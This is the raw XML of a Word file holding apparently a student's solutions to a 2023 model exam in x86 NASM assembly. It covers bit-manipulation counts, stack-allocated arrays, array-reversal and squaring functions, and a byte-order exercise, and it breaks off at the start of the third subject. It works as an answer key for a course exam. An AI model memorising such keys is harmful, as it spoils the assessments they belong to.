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7A1CDA" w14:textId="0DB17820" w:rsidR="00E73B75" w:rsidRPr="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E73B75"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</w:rPr>
        <w:t>MODEL 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AAFB09" w14:textId="2D605A6F" w:rsidR="00E73B75" w:rsidRPr="000574C8" w:rsidRDefault="00E73B75" w:rsidP="00E73B75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0574C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SUB 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786D79A2" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="000574C8" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000574C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D7DF000" wp14:editId="636D21D0">
            <wp:extent cx="5943600" cy="1602740"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="683424324" name="Imagine 1" descr="O imagine care conține text, Font, captură de ecran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24324" name="Imagine 1" descr="O imagine care conține text, Font, captură de ecran&#10;&#10;Descriere generată automa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353D" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="000975EC" w:rsidRDefault="00E73B75" w:rsidP="00E73B75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975EC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">FORMAT PRINTF: </w:t>
      </w:r>
      <w:r w:rsidRPr="000975EC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000975EC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000975EC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> `%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000975EC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>u%u</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000975EC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>\n`, 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26672287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</w:t>
      </w:r>
      <w:r w:rsidRPr="000574C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;TODO a: print least significant 2 bits of the second most significant byte of num</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA465D0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[num]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E2D56D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shl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4722698C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shr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24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E380D7C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and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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1769F78F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74AF48D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7194A9A0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shr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6F3C483F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and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76AC9317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593E373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258983A0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278B6A97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fmt1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A84F80D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4A2CD25B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348EB969" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="000574C8" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="626BCE81" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B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p w14:paraId="5CDE1124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</w:t>
      </w:r>
      <w:r w:rsidRPr="000574C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;TODO b: print number of bits set on odd positions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E446998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[num]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3193CC0E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0E07F4C7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loop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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624638E7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3B01E21D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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524C5776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5C43D68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64749C11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and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6894177B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1455CBB0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equal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A73D809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jne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not_equal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0933947C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AD409E7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equal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538CA6E1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shr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</w:p>
    <w:p w14:paraId="55EAD5E9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2D1D331F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loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543F002E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FF6CF56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0574C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not_equal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000574C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0A7CDBEE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shr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</w:p>
    <w:p w14:paraId="730DEA16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loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DA49C5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C4D0D78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end:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030A74A9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PRINTF32 `%u\n\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`,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432A367C" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45790AA4" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B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</w:p>
    <w:p w14:paraId="4F9A0D05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;TODO c: print number of groups of 3 consecutive bits set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F251AE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[num]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62346A62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0FE21A34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014063E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loop2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B40720F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026474E8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end2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E59862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1D13D8F9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and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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D778C1F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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E473591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equal2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDEA6E8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jne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not_equal2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B60B10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6D35D86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equal2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B7A90E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shr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51DD73F3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37B60067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loop2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3A4210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2054710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not_equal2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F841630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shr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6954266C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loop2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C52E828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3A12816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end2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088BC0DE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7472B546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fmt2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA13A35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17430628" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="000574C8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574C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574C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0574C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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014FEC99" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723468AB" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75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0574C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SUB 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA06613" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75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0574C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CB72577" wp14:editId="49253E91">
            <wp:extent cx="5943600" cy="1779270"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="985737987" name="Imagine 1" descr="O imagine care conține text, Font, număr, captură de ecran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37987" name="Imagine 1" descr="O imagine care conține text, Font, număr, captură de ecran&#10;&#10;Descriere generată automa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D952" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00B373B7" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr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color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>!!! DACA TREBUIE DECLARAT UN VECTOR PE HEAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6235E046" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34DE0FBA" wp14:editId="460E1E3F">
            <wp:extent cx="6041943" cy="922020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1222828563" name="Imagine 1" descr="O imagine care conține text, captură de ecran, software, Software multimedia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28563" name="Imagine 1" descr="O imagine care conține text, captură de ecran, software, Software multimedia&#10;&#10;Descriere generată automat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17" t="46154" r="14873" b="36789"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6044644" cy="92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9D431" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00B373B7" w:rsidRDefault="00E73B75" w:rsidP="00E73B75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color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">DECLARARE (pe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stiva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, ca in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enunt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>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707E31D1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section .data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344A0CD9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num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dd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55555123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DBA64B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gram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;;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 TODO d: declare </w:t>
      </w:r>
      <w:proofErr w:type="spell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byte_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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so that PRINT_HEX shows </w:t>
      </w:r>
      <w:proofErr w:type="spell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babadac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="60874D55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array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db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'a', 'b', 'c', 'd', 'e'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AE97A9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num_array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dd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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FD09CE" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr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color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>REZOLVARE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436E14C1" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr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color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711EFFAF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;TODO a: allocate on array of </w:t>
      </w:r>
      <w:proofErr w:type="gram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20 byte</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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elements and </w:t>
      </w:r>
      <w:proofErr w:type="spell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initializate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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it incrementally starting from 'A'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D43D908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sub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20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alocam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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pe </w:t>
      </w:r>
      <w:proofErr w:type="spell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stiva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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vectorul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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char[20]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE9D682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</w:p>
    <w:p w14:paraId="2BD70176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</w:t>
      </w:r>
      <w:proofErr w:type="spell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xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, </w:t>
      </w:r>
      <w:proofErr w:type="spell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ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:p>
    <w:p w14:paraId="725FC33D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'A'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED1DDEA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loop_letters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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343B436F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20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6096C29A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end_letter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12B48084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1B2F104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bl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D4EE9C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5BD2AD70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3C548891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loop_letters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1207E537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end_letter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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53F12DD8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6678A084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loop_print_letters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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3CB2DB1E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20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348CEEB5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end_print_letters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DAE634F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624811A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01798D27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bl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2F28C851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A999947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019A1393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0EED90DF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ADB83C5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625AE9DA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fmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="54CA4B14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6FAF13E8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2A9B9CB9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ED83F59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39030084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433790DC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5BD17A5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0240F8FA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loop_print_letters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="119C2EBE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end_print_letters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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2FB9F10A" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00D8288E" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000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b.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8288E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>APEL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8288E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> FUNCTIE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B60D817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</w:t>
      </w:r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;TODO b: call </w:t>
      </w:r>
      <w:proofErr w:type="spell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array_reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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and print reversed array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4E9A76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B886BDE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PRINTF32 `\n\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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F1D08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52299FA3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21DE0111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5CDB9C47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700724FC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D22C58A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num_array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1A0131DA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array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE22F31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array_reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12395115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3BE843C8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87D2F7D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5593B476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1E7EFBD8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0890534E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23D895E7" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr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color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>FUNCTIE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FB8C18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b: implement </w:t>
      </w:r>
      <w:proofErr w:type="spell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array_reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B3A5201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array_reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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4768CFAC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1AF3D520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1743E5B9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2D0AD6B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3A99B917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365E6B51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5F47D299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1671F0E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char *array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1F565E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12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unsigned int length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69413EC5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711F79E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57551907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loop_reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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76ADF6F5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0AE817E8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end_reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04E9DF59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B2A186D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38F7BED4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dl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byte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13608B75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79D2C312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259272E4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loop_reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E4E5749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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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end_reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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1E779025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6BE1A265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get_vector_reversed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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4A1FFD6B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4849CE1C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end_b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5274D2A6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6C21945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</w:p>
    <w:p w14:paraId="3F506CA5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0B64C418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dl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C39181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;pop byte [</w:t>
      </w:r>
      <w:proofErr w:type="spell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eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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+ 1 * </w:t>
      </w:r>
      <w:proofErr w:type="spell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ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B1D1F5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70D0AADF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get_vector_reversed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="10382B6B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end_b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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55E66BD4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03C39A8E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20CFAB4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print_vector_b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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46FA78F2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11FEC68B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end_print_b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="761378D1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40EDE36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296FBA3A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3E47F92B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6A2EC601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</w:t>
      </w:r>
      <w:proofErr w:type="spell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xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, </w:t>
      </w:r>
      <w:proofErr w:type="spell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edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F6EF6F9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F05636E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movzx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byte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0CC45CEA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642D2A7D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fmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33C3E111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7C9E12FA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574AFDCD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2F77A69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1B1FFF4A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35917826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28BB2179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DFFE65D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4D355B98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print_vector_b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1307BFF2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end_print_b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B2509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2B5B65B5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6C598C78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426ECEE1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30036E2C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0EA65F0F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1F998A75" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75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color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>APELARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60617355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</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8288E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;TODO c: call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8288E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pow_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8288E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and print the result array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15927300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2E5288CA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2F56734B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2291C9C8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4DF6C6B6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F3211C8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two_byte_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EE0DB15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[size]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63417BA9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one_byte_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6231E3BA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pow_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2EFA2E8A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4ED8210D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478BD0C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36F96095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17FB0B33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14E9598E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571D4EA3" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr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color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>FUNCTIA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5EA9F2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c: implement </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8288E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pow_arraypowArray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3CAA5D84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D8288E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pow_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8288E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6ED2580F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16891FC1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2593DC99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48296E0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10E2D92F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69B29053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0257BF76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B58B647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D8288E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vector 1 byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1555CCA4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12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D8288E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D8288E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len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="179869F3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16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D8288E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vector 2 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2555DC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C5BB6CF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5580ED87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D8288E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compute_square</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8288E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4E253513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0471FC5D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end_compute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23EB22D3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EA3C47C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3BB575A1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al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byte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3B6E7E40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imul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18EE3225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5068791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ax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</w:p>
    <w:p w14:paraId="668B7C26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02699AC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33E2031F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compute_square</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="009E997A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D8288E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end_compute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8288E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</w:p>
    <w:p w14:paraId="5F728F4C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48F0365E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print:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42629EB2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5C6EF7BE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end_print</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28230F23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40886C2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3626A089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02E97C5E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5254D865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1BFE8804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EB4CC76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49147786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ax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313A3369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0D313EB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5CAFF0DE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fmt2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B84DF6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0D93C3FE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</w:t>
      </w:r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78D290C8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1093A9F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1A1ACA3E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10CD7642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353E6B43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36A5C667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0B927D3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2A398B4B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print</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA17437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D8288E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end_print</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8288E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58F4561E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098ABB8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6C007E1E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69F341A7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D8288E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342A8E24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F9BD930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78E7E5AB" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00D8288E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D8288E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D8288E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7362CC27" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00D8288E" w:rsidRDefault="00E73B75" w:rsidP="00E73B75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color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8288E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">DECLARARE: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303ED7E6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byte_array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2509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db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0xac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0xad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0xab</w:t>
      </w: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B2509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0xb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ED6366" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:ind w:left="360"/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color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>PRINTARE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0B3FE2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gram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;;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 TODO d: this print of an uint32_t should print </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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babadac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B2509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</w:p>
    <w:p w14:paraId="5D9E9672" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00B2509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PRINTF32 `%x\n\x0`, [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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byte_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B2509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27FE68FC" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00B25095" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="660E4FA8" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr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color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SUB 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E12BE24" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75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B373B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26AB4243" wp14:editId="1319C2FC">
            <wp:extent cx="5943600" cy="1378585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1592252396" name="Imagine 1" descr="O imagine care conține text, Font, captură de ecran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2396" name="Imagine 1" descr="O imagine care conține text, Font, captură de ecran&#10;&#10;Descriere generată automa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4A50" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr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color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD0B3BC" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00B373B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373B7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CFLAGS</w:t>
      </w:r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B373B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B6B1B1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
